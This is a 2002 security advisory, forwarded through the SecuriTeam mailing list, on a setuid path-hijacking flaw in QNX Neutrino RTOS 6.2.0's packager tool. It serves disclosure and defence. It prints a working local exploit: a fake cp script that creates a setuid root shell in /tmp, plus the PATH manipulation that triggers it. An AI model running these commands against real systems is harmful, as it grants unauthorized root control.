[NEWS] Non-Explicit Path Vulnerability in QNX Neutrino RTOS

From: support@securiteam.com
Date: 11/10/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 10 Nov 2002 11:12:50 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure, please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

  Non-Explicit Path Vulnerability in QNX Neutrino RTOS
------------------------------------------------------------------------

SUMMARY

 <http://www.qnx.com/products/ps_neutrino> QNX Software Systems Ltd.'s
Neutrino RTOS (QNX) is a real-time operating system designed for use in
embedded systems. "Companies worldwide like Cisco, Delphi, Siemens,
Alcatel and Texaco depend on the QNX technology for network routers,
medical devices, intelligent transportation systems, safety and security
systems, next-generation robotics, and other mission-critical
applications. In addition, QNX forms the core for Ford Motor Co.'s Lincoln
Aviator IAV, an engineering concept vehicle. The new system supports the
development of next-generation in-car communications, infotainment, and
telematics applications." A vulnerability in the product allows local
attackers to gain elevated privileges.

DETAILS

Vulnerable systems:
 * QNX Neutrino RTOS 6.2.0

Immune systems:
 * QNX Neutrino RTOS 6.2.1

Since a setuid root application packager within QNX inappropriately
executes external applications without using their full paths, local
attackers can potentially obtain root privilege. The following is a sample
exploit (with comments):

The packager will at one point call the copy binary (cp). The first step
is to create a tainted copy command and ensure it is executable. This copy
command will copy a shell to /tmp and give the shell setuid privilege:

$ cat > cp <<EOF
> #!/bin/sh
> /bin/cp /bin/sh /tmp/sh
> chmod 4755 /tmp/sh
> EOF
$ chmod 755 cp

The attacker then modifies the PATH environment variable to search the
current working directory before anything else:

$ PATH=$PWD:$PATH

The attacker now creates a directory and calls the packager on that
created directory:

$ mkdir temp
$ packager temp
..

The packager will ask a number of questions. When the procedure is
complete, a root shell will be waiting for the attacker:

$ ls -l /tmp/sh
- -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh

Analysis:
Local attackers that exploit this vulnerability can potentially gain total
control over a targeted system. The fact that exploitation must be done
locally makes it more unlikely that damage can be done quickly or in a
widespread fashion. Still for organizations that may still be making use
of QNX, insider threat is still a real danger.

Workaround:
Use the command chmod -s 'which packager' to remove the setuid bit from
the packager binary.

Vendor fix:
QNX Neutrino RTOS 6.2.1, which is slated to be released in January 2002,
should fix this vulnerability. According to QNX, concerned customers can
contact their sales rep for an advance copy.
 
Disclosure timeline:
10/02/2002 Issue disclosed to iDEFENSE
10/31/2002 QNX notified (support@qnx.com)
10/31/2002 iDEFENSE clients notified
11/01/2002 Response received from Marcin Dzieciol (marcind@qnx.com)
11/07/2002 Response received from Rodney Dowdell
11/08/2002 Phone conversation with Barry Faubert, Tech Support
11/08/2002 Public disclosure

ADDITIONAL INFORMATION

The original advisory can be downloaded by going to:
 <http://www.idefense.com/advisory/11.08.02b.txt>
http://www.idefense.com/advisory/11.08.02b.txt

The information has been provided by <mailto:dendler@idefense.com> David
Endler of iDEFENSE, the vulnerability was discovered by Texonet.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages